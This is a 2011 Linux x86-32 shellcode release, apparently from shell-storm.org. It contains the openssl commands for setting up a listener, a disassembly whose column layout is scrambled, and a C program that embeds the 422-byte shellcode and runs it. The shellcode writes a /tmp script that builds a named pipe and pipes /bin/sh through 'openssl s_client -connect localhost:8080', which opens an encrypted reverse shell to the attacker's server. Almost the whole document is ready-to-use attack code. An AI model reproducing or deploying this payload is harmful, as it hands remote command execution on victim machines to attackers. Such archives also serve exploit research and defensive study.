/*

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

Title:
Date:
Tested on:
Author:

Linux/x86-32 - ConnectBack with SSL connection - 422 bytes

2011-06-08
ArchLinux i686
Jonathan Salwan - twitter: @jonathansalwan

http://shell-storm.org
Configurations server
===========================================================================
jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024
jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr
jonathan@ArchLinux [ssl] $ cp server.key server.key.org
jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key
jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -sign
key server.key -out server.crt
jonathan@ArchLinux [ssl] $ ll
total 16
-rw-r--r-- 1 jonathan users 757 Jun 8 09:36 server.crt
-rw-r--r-- 1 jonathan users 603 Jun 8 09:36 server.csr
-rw-r--r-- 1 jonathan users 887 Jun 8 09:36 server.key
-rw-r--r-- 1 jonathan users 963 Jun 8 09:36 server.key.org
jonathan@ArchLinux [ssl] $
Running server
===========================================================================
jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.cr
t -accept 8080
After the server was opened, you can send the shellcode.
Warning! The client need tsch and openssl installed.
Informations shellcode
===========================================================================
Reverse TCP with SSL (why not)
Linux x86 32bits
422 bytes
ASM sources
===========================================================================
08048054 <main>:
8048054:
31 c0
8048056:
50
8048057:
6a 65
8048059:
68 6b 70 69 70
804805e:
68 2f 62 61 63
8048063:
68 2f 74 6d 70
8048068:
89 e3
804806a:
b0 0a
804806c:
cd 80
804806e:
85 c0
8048070:
75 32

xor
push
push
push
push
push
mov
mov
int
test
jne

%eax,%eax
%eax
$0x65
$0x7069706b
$0x6361622f
$0x706d742f
%esp,%ebx
$0xa,%al
$0x80
%eax,%eax
80480a4 <del2>

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

8048072:
8048074:
8048076:
8048078:
804807a:
804807c:
804807d:
804807f:
8048083:
8048088:
804808d:
8048092:
8048097:
804809c:
804809e:
80480a0:
80480a2:

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

31
31
31
b3
31
50
6a
66
68
68
68
68
68
89
b2
b0
cd

c0
db
d2
01
c0

xor
xor
xor
mov
xor
push
push
pushw
push
push
push
push
push
mov
mov
mov
int

%eax,%eax
%ebx,%ebx
%edx,%edx
$0x1,%bl
%eax,%eax
%eax
$0x6e
$0x5c64
$0x6574656c
$0x65642065
$0x7069706b
$0x6361622f
$0x706d742f
%esp,%ecx
$0x17,%dl
$0x4,%al
$0x80

080480a4 <del2>:
80480a4:
31 c0
80480a6:
50
80480a7:
66 68 73 6c
80480ab:
68 2f 63 62 73
80480b0:
68 2f 74 6d 70
80480b5:
89 e3
80480b7:
b0 0a
80480b9:
cd 80
80480bb:
85 c0
80480bd:
75 2a
80480bf:
31 c0
80480c1:
31 db
80480c3:
31 d2
80480c5:
50
80480c6:
68 65 64 5c 6e
80480cb:
68 65 6c 65 74
80480d0:
68 73 6c 20 64
80480d5:
68 2f 63 62 73
80480da:
68 2f 74 6d 70
80480df:
89 e1
80480e1:
b3 01
80480e3:
b2 14
80480e5:
b0 04
80480e7:
cd 80

xor
push
pushw
push
push
mov
mov
int
test
jne
xor
xor
xor
push
push
push
push
push
push
mov
mov
mov
mov
int

%eax,%eax
%eax
$0x6c73
$0x7362632f
$0x706d742f
%esp,%ebx
$0xa,%al
$0x80
%eax,%eax
80480e9 <open>
%eax,%eax
%ebx,%ebx
%edx,%edx
%eax
$0x6e5c6465
$0x74656c65
$0x64206c73
$0x7362632f
$0x706d742f
%esp,%ecx
$0x1,%bl
$0x14,%dl
$0x4,%al
$0x80

080480e9 <open>:
80480e9:
31 c0
80480eb:
31 c9
80480ed:
31 d2
80480ef:
66 b9 41 04
80480f3:
66 ba a4 01
80480f7:
50
80480f8:
66 68 73 6c
80480fc:
68 2f 63 62 73
8048101:
68 2f 74 6d 70
8048106:
89 e3
8048108:
b0 05
804810a:
cd 80
804810c:
89 c6

xor
xor
xor
mov
mov
push
pushw
push
push
mov
mov
int
mov

%eax,%eax
%ecx,%ecx
%edx,%edx
$0x441,%cx
$0x1a4,%dx
%eax
$0x6c73
$0x7362632f
$0x706d742f
%esp,%ebx
$0x5,%al
$0x80
%eax,%esi

6e
68
6c
65
6b
2f
2f
e1
17
04
80

0804810e <wtite>:

64
65
20
70
62
74

5c
74
64
69
61
6d

65
65
70
63
70

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**

804810e:
8048110:
8048112:
8048114:
8048115:
8048119:
804811e:
8048123:
8048128:
804812d:
8048132:
8048137:
804813c:
8048141:
8048146:

31
89
31
50
66
68
68
68
68
68
68
68
68
68
68

d2
f3
c0
68
63
70
3e
73
6e
20
70
63
70
3c

70
6b
2f
2f
68
2f
2f
65
6b
2f
2f

65
70
62
74
20
74
62
20
70
62
74

69
61
6d
31
63
69
7c
69
61
6d

xor
mov
xor
push
pushw
push
push
push
push
push
push
push
push
push
push

%edx,%edx
%esi,%ebx
%eax,%eax
%eax
$0x6570
$0x69706b63
$0x61622f70
$0x6d742f3e
$0x31206873
$0x63742f6e
$0x69622f20
$0x7c206570
$0x69706b63
$0x61622f70
$0x6d742f3c

"\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30" >----------+
localhost:8080
|
If you change that, you need to change write(..., ..., size_t) (%edx) |
|
804814b:
68 38 30 20 30
push $0x30203038
<---+
8048150:
68 74 3a 38 30
push $0x30383a74
<---+
8048155:
68 6c 68 6f 73
push $0x736f686c
<---+
804815a:
68 6c 6f 63 61
push $0x61636f6c
<---+
804815f:
8048164:
8048169:
804816e:
8048173:
8048178:
804817d:
8048182:
8048187:
804818c:
8048191:
8048196:
804819b:
80481a0:
80481a5:
80481aa:
80481ac:
80481ae:
80481b0:
80481b2:

68
68
68
68
68
68
68
68
68
68
68
68
68
68
68
89
b2
31
b0
cd

65
63
6e
63
6c
65
6e
72
20
70
69
61
6d
64
6d
e1
77
c0
04
80

63
6f
74
6c
20
6e
2f
2f
2f
20
70
63
70
20
6b

74
6e
20
69
73
73
6f
62
75
26
65
6b
2f
2f
6e

20
6e
2d
65
5f
73
70
69
73
26
20
70
62
74
6f

push
push
push
push
push
push
push
push
push
push
push
push
push
push
push
mov
mov
xor
mov
int

$0x20746365
$0x6e6e6f63
$0x2d20746e
$0x65696c63
$0x5f73206c
$0x73736e65
$0x706f2f6e
$0x69622f72
$0x73752f20
$0x26262070
$0x20657069
$0x706b6361
$0x622f706d
$0x742f2064
$0x6f6e6b6d
%esp,%ecx
$0x77,%dl
%eax,%eax
$0x4,%al
$0x80

080481b4 <close>:
80481b4:
31 c0
80481b6:
b0 06
80481b8:
89 f3
80481ba:
cd 80

xor
mov
mov
int

%eax,%eax
$0x6,%al
%esi,%ebx
$0x80

080481bc <execve>:
80481bc:
31 c0
80481be:
50
80481bf:
66 68 73 6c
80481c3:
68 2f 63 62 73
80481c8:
68 2f 74 6d 70
80481cd:
89 e3

xor
push
pushw
push
push
mov

%eax,%eax
%eax
$0x6c73
$0x7362632f
$0x706d742f
%esp,%ebx

**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
**
*/

80481cf:
80481d0:
80481d4:
80481d6:
80481d7:
80481d9:
80481dd:
80481e2:
80481e4:
80481e5:
80481e6:
80481e7:
80481e8:
80481ea:
80481ec:
80481ee:
80481f0:

50
66
89
50
6a
66
68
89
50
53
51
52
89
89
31
b0
cd

68 2d 65
e1
68
68 2f 73
2f 62 69 6e
e2

e1
d3
d2
0b
80

080481f2 <exit>:
80481f2:
31 c0
80481f4:
b0 01
80481f6:
31 db
80481f8:
cd 80

push
pushw
mov
push
push
pushw
push
mov
push
push
push
push
mov
mov
xor
mov
int

%eax
$0x652d
%esp,%ecx
%eax
$0x68
$0x732f
$0x6e69622f
%esp,%edx
%eax
%ebx
%ecx
%edx
%esp,%ecx
%edx,%ebx
%edx,%edx
$0xb,%al
$0x80

xor
mov
xor
int

%eax,%eax
$0x1,%al
%ebx,%ebx
$0x80

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char SC[] = "\x31\xc0\x50\x6a\x65\x68\x6b\x70\x69\x70\x68\x2f\x62\x61\x63"
"\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0\x75\x32"
"\x31\xc0\x31\xdb\x31\xd2\xb3\x01\x31\xc0\x50\x6a\x6e\x66\x68"
"\x64\x5c\x68\x6c\x65\x74\x65\x68\x65\x20\x64\x65\x68\x6b\x70"
"\x69\x70\x68\x2f\x62\x61\x63\x68\x2f\x74\x6d\x70\x89\xe1\xb2"
"\x17\xb0\x04\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63"
"\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0"
"\x75\x2a\x31\xc0\x31\xdb\x31\xd2\x50\x68\x65\x64\x5c\x6e\x68"
"\x65\x6c\x65\x74\x68\x73\x6c\x20\x64\x68\x2f\x63\x62\x73\x68"
"\x2f\x74\x6d\x70\x89\xe1\xb3\x01\xb2\x14\xb0\x04\xcd\x80\x31"
"\xc0\x31\xc9\x31\xd2\x66\xb9\x41\x04\x66\xba\xa4\x01\x50\x66"
"\x68\x73\x6c\x68\x2f\x63\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3"
"\xb0\x05\xcd\x80\x89\xc6\x31\xd2\x89\xf3\x31\xc0\x50\x66\x68"
"\x70\x65\x68\x63\x6b\x70\x69\x68\x70\x2f\x62\x61\x68\x3e\x2f"
"\x74\x6d\x68\x73\x68\x20\x31\x68\x6e\x2f\x74\x63\x68\x20\x2f"
"\x62\x69\x68\x70\x65\x20\x7c\x68\x63\x6b\x70\x69\x68\x70\x2f"
"\x62\x61\x68\x3c\x2f\x74\x6d"
/* localhost:8080 */
"\x68\x38\x30\x20\x30\x68\x74\x3a\x38\x30\x68\x6c\x68\x6f\x73"
"\x68\x6c\x6f\x63\x61"
/* EOF */
"\x68\x65\x63\x74\x20\x68\x63\x6f\x6e\x6e\x68\x6e\x74\x20\x2d"
"\x68\x63\x6c\x69\x65\x68\x6c\x20\x73\x5f\x68\x65\x6e\x73\x73"
"\x68\x6e\x2f\x6f\x70\x68\x72\x2f\x62\x69\x68\x20\x2f\x75\x73"
"\x68\x70\x20\x26\x26\x68\x69\x70\x65\x20\x68\x61\x63\x6b\x70"
"\x68\x6d\x70\x2f\x62\x68\x64\x20\x2f\x74\x68\x6d\x6b\x6e\x6f"
"\x89\xe1\xb2\x77\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x06\x89"
"\xf3\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63\x62\x73"
"\x68\x2f\x74\x6d\x70\x89\xe3\x50\x66\x68\x2d\x65\x89\xe1\x50"

"\x6a\x68\x66\x68\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe2\x50\x53"
"\x51\x52\x89\xe1\x89\xd3\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\x31\xdb\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
}